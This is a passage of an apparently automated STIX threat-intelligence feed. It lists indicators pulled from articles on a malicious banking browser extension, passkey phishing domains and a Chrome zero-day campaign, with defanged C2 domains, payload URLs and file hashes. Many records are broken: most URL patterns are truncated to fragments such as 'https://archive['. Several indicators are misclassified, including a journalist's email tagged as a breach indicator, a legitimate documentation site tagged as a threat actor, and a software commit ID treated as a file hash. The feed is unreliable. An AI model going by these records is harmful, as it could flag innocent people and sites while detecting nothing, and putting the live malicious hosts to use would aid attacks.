algorithm As noted at the begin","pattern":"[file:hashes.'SHA-256' = 'c8c38634dd44d7c6162c66174a6ee23ee404265125166e8d757681bdd66a4268']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e3aa4698-e432-4046-b3d6-048f6eef72a9","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"url: https://archive[","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: 498752f735a1ca0987/{campaignId} .NET PE Injector sub-module hxxps://archive[.]org/download/hotelmoskva/hotelmoskva.jpg SentinelMemorySca","pattern":"[url:value = 'https://archive[']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--505e4b0a-09bf-42c2-987f-5c0e7013f286","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"url: https://connection[","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: dpoint, passing the campaign ID. In this sample, the URL is hxxps://connection[.]upgradeonline[.]site . Loader beacons to C2 Second stage:","pattern":"[url:value = 'https://connection[']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--aa73d4a4-f8d0-4aae-9fa9-06d2f9d7a1ea","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"url: https://granderevolucao[","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: r URL Malicious browser extension installer payload main-v2 hxxps://granderevolucao[.]store/5c92d3b8734b4f498752f735a1ca0987/{campaignId} .NET P","pattern":"[url:value = 'https://granderevolucao[']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1c1a5933-802e-4895-bbf9-03f1c773489a","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"url: https://ia601808[","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: er.exe : legit SentinelOne binary for side-loading sentinel hxxps://ia601808[.]us[.]archive[.]org/5/items/sentinel_20260722_0435/Sentinel","pattern":"[url:value = 'https://ia601808[']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e20ba41d-c720-453b-9ada-1e0ecef86d02","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"url: https://volmira[","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: intained. After retrieving the domains, the malware queries hxxps://volmira[.]site/api/ext/version to obtain the extension version. The","pattern":"[url:value = 'https://volmira[']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--dc86e3a6-c10e-43be-917c-5c8c53738b0e","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"url: https://zaviro[","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: two C2 endpoints: hxxps://volmira[.]site//api/savecreds and hxxps://zaviro[.]online//api/v1/fingerprint . The following POST request wa","pattern":"[url:value = 'https://zaviro[']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5bebf25e-016c-4ea7-9b67-755440b4ffe7","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"url: http://www[","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: attempting to download a page from the unregistered domain hxxp://www[.]creamp1eonlyfans[.]net . Because this domain should not re","pattern":"[url:value = 'http://www[']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--05ca4b85-431f-4b0c-904a-846deddb7ab3","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: add-passkey.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: keyhelpdesk[.]com secure-passkey[.]com setupmypasskey[.]com add-passkey[.]com integratedsso[.]com oktasession[.]com syncmykey[.]com por","pattern":"[domain-name:value = 'add-passkey.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--748ec59f-9977-4d3e-9417-d7a55bf17e84","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: domainlify.net","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: of the registered domains are below - service-nowinc[.]com domainlify[.]net Passkey-Themed Social Engineering Leads to Cloud Compromi","pattern":"[domain-name:value = 'domainlify.net']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--54478ded-c110-4163-a832-29d88a13c1ee","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: integratedsso.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: secure-passkey[.]com setupmypasskey[.]com add-passkey[.]com integratedsso[.]com oktasession[.]com syncmykey[.]com portalsetuphub[.]com It","pattern":"[domain-name:value = 'integratedsso.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--00c45a0b-8d0c-47bf-825c-de422e4da7c1","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: oktasession.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: setupmypasskey[.]com add-passkey[.]com integratedsso[.]com oktasession[.]com syncmykey[.]com portalsetuphub[.]com It's worth noting th","pattern":"[domain-name:value = 'oktasession.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--57aede2f-ac08-4bed-9893-83e839003583","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: passkeyhelpdesk.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: in the pattern: \"<company name>.<malicious domain>[.]com\" - passkeyhelpdesk[.]com secure-passkey[.]com setupmypasskey[.]com add-passkey[.]c","pattern":"[domain-name:value = 'passkeyhelpdesk.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d5c4d01c-bdbf-4386-b7ef-97b9bce14678","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: portalsetuphub.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: .]com integratedsso[.]com oktasession[.]com syncmykey[.]com portalsetuphub[.]com It's worth noting that this modus operandi overlaps with","pattern":"[domain-name:value = 'portalsetuphub.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7a234acb-3358-4542-8e34-3bee0a5b3024","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: secure-passkey.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: any name>.<malicious domain>[.]com\" - passkeyhelpdesk[.]com secure-passkey[.]com setupmypasskey[.]com add-passkey[.]com integratedsso[.]co","pattern":"[domain-name:value = 'secure-passkey.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--20839c37-5b55-46d0-a24d-54673a5e676a","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: service-nowinc.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: and individuals. Some of the registered domains are below - service-nowinc[.]com domainlify[.]net Passkey-Themed Social Engineering Leads","pattern":"[domain-name:value = 'service-nowinc.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--30685375-a8de-4087-923c-131dd25f3e01","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: setupmypasskey.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: domain>[.]com\" - passkeyhelpdesk[.]com secure-passkey[.]com setupmypasskey[.]com add-passkey[.]com integratedsso[.]com oktasession[.]com s","pattern":"[domain-name:value = 'setupmypasskey.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8997d742-3a61-4a33-82f8-143fda1b5cd7","created":"2026-09-13T10:11:48.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: syncmykey.com","description":"Seen in \"Attackers Use Passkey Phishing to Hijack Microsoft Cloud Accounts and Exfiltrate Data\" (The Hacker News). Context: com add-passkey[.]com integratedsso[.]com oktasession[.]com syncmykey[.]com portalsetuphub[.]com It's worth noting that this modus op","pattern":"[domain-name:value = 'syncmykey.com']","pattern_type":"stix","valid_from":"2026-09-13T10:11:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-use-passkey-phishing-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--92d05bd2-0edf-4e5c-996a-c05c31efc2b8","created":"2026-09-13T01:10:01.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha1: 072558bc1a539e9936584647df51fb1797c982b0","description":"Seen in \"Re: UnrealIRCd 6.2.7 released & hot-patch to fix security issues for existing installations\" (oss-security). Context: mes writes: https://github.com/unrealircd/unrealircd/commit/072558bc1a539e9936584647df51fb1797c982b0. It's a great example of the shape of many LLM-reported (I'","pattern":"[file:hashes.'SHA-1' = '072558bc1a539e9936584647df51fb1797c982b0']","pattern_type":"stix","valid_from":"2026-09-13T01:10:01.000Z","labels":["auto-extracted","vulnerability"],"confidence":30,"external_references":[{"source_name":"oss-security","url":"https://seclists.org/oss-sec/2026/q3/729"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7488e84f-ba8c-46af-8085-f8dc894e0ccf","created":"2026-09-12T14:40:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"email: mail@journalistjagmeet.com","description":"Seen in \"Revolut confirms customer data breach through fake government requests\" (TechCrunch · Security). Context: You can contact or verify outreach from Jagmeet by emailing mail@journalistjagmeet.com . View Bio","pattern":"[email-addr:value = 'mail@journalistjagmeet.com']","pattern_type":"stix","valid_from":"2026-09-12T14:40:00.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"TechCrunch · Security","url":"https://techcrunch.com/2026/09/12/revolut-confirms-customer-data-breach-through-fake-government-requests/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bcb4b7c2-58bb-45e0-a0eb-44efd6dd750e","created":"2026-09-12T10:24:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: gemini-advertisers.com","description":"Seen in \"When the Whole Company Adopts AI: What It Does to Your SOC\" (The Hacker News). Context: iated with Google and instead rely on the suspicious domain gemini-advertisers[.]com, indicating a brand impersonation attempt designed to dri","pattern":"[domain-name:value = 'gemini-advertisers.com']","pattern_type":"stix","valid_from":"2026-09-12T10:24:44.000Z","labels":["auto-extracted","research"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/when-whole-company-adopts-ai-what-it.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9c59cace-a110-43a5-bdcb-c51388d489fe","created":"2026-09-12T09:07:56.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: rubydoc.info","description":"Seen in \"OpenAI Agents Linked to RubyGems Campaign That Gained RCE on RubyDoc Servers\" (The Hacker News). Context: The agents are said to have exploited a design quirk in the RubyDoc.info documentation build process to exfiltrate public data from","pattern":"[domain-name:value = 'rubydoc.info']","pattern_type":"stix","valid_from":"2026-09-12T09:07:56.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/openai-agents-linked-to-rubygems.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fef766b2-5007-4866-a49c-f1977e0d802d","created":"2026-09-12T08:04:47.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: gitprogram.com","description":"Seen in \"China-Linked Hackers Chain Chrome Zero-Day With Windows Kernel Flaw in Attacks\" (GBHackers). Context: address UTA0560 Host associated with cloud.shinewrist[.]net gitprogram[.]com Domain JungleBamboo Phishing, exploit delivery, and C2 in","pattern":"[domain-name:value = 'gitprogram.com']","pattern_type":"stix","valid_from":"2026-09-12T08:04:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-chain-chrome-zero-day/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--764274ab-02a4-479e-989a-07c94326a63f","created":"2026-09-12T08:04:47.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: ocr.opusaccel.top","description":"Seen in \"China-Linked Hackers Chain Chrome Zero-Day With Windows Kernel Flaw in Attacks\" (GBHackers). Context: 0560 Exploit-hosting and command-and-control infrastructure ocr[.]opusaccel[.]top Domain UTA0560 GRIMWEDGE JScript backdoor C2 endpoint 2","pattern":"[domain-name:value = 'ocr.opusaccel.top']","pattern_type":"stix","valid_from":"2026-09-12T08:04:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-chain-chrome-zero-day/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b81300be-dc85-4990-a015-d5ce7dfebea6","created":"2026-09-12T08:04:47.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: shinewrist.net","description":"Seen in \"China-Linked Hackers Chain Chrome Zero-Day With Windows Kernel Flaw in Attacks\" (GBHackers). Context: Compromise Indicator Type Actor Description / SHA256 cloud.shinewrist[.]net Domain UTA0560 Exploit-hosting and command-and-control in","pattern":"[domain-name:value = 'shinewrist.net']","pattern_type":"stix","valid_from":"2026-09-12T08:04:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-chain-chrome-zero-day/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--de5cced9-eaa5-4693-9a59-6aede12bb77b","created":"2026-09-12T08:04:47.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 5eb5645511b00e4f4d73125654eeb3a3930fcf09c65685dc7f03f725331492e3","description":"Seen in \"China-Linked Hackers Chain Chrome Zero-Day With Windows Kernel Flaw in Attacks\" (GBHackers). Context: 256 UTA0560 msgbox.exe GRIMWEDGE loader, a Win32 executable 5eb5645511b00e4f4d73125654eeb3a3930fcf09c65685dc7f03f725331492e3 SHA-256 JungleBamboo a001 LONGTALE malicious Chrome extensi","pattern":"[file:hashes.'SHA-256' = '5eb5645511b00e4f4d73125654eeb3a3930fcf09c65685dc7f03f725331492e3']","pattern_type":"stix","valid_from":"2026-09-12T08:04:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-chain-chrome-zero-day/"}]}]}